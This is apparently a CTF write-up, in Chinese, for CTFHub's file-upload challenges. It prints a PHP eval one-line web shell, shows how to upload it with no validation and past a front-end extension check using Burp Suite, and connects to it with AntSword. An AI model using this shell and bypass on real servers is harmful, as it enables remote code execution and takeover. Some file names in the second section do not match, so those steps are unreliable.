CTFHub题解-技能树-Web-Web工具配置-文件上传
本文先贴出 无验证 和 前端验证 的题解~
(一)无验证
1.知识点
需要用到的:
(1)一句话木马
(2)中国蚁剑
下载在这里:
https://github.com/AntSwordProject/AntSword-Loader/tree/2.0.1
https://github.com/AntSwordProjectAntSword-Loader/AntSword-Loader-v4.0.3-win32-x64.zip at 4.0.3 · AntSwordProject/AntSword-Loader
2.题解
笔者本来用的是 <?php @eval($_GET["pass"]);?>
上传发现用蚁剑连接不了~
所以重新换成POST上传了~
<?php @eval($_POST["pass"]);?>
注意:pass是密码哦~你可以自定义
下面我们看看有没有有效的上传:
访问一下我们的一句话木马目录~
页面没有报错,说明可以访问!
在蚁剑添加数据:
http://challenge-5bf3cd70198a12f8.sandbox.ctfhub.com:10080/upload/kule.php
pass
(二) 前端验证
1.知识点
需要用到的:
(1)一句话木马
(2)中国蚁剑
下载在这里:
https://github.com/AntSwordProject/AntSword-Loader/tree/2.0.1
https://github.com/AntSwordProjectAntSword-Loader/AntSword-Loader-v4.0.3-win32-x64.zip at 4.0.3 · AntSwordProject/AntSword-Loader
(3)burpsuite抓包改包
2.题解
先右键查看一下源码~
我们发现,它只允许 jpg、png、gif 格式上传~
那我们就把一句话木马改成这三种格式的任意一种吧!
那我们就上传一个 ddddhm.php.jpg
你可以任意取名~
把文件选择好,然后打开浏览器代理,用burpsuite抓包~
Go一下,页面200 ok 返回正常
上传成功啦~
现在我们根据路径用蚁剑连接~
http://challenge-205ed9ec00cccedf.sandbox.ctfhub.com:10080/upload/kule.php.jpg
pass
好啦~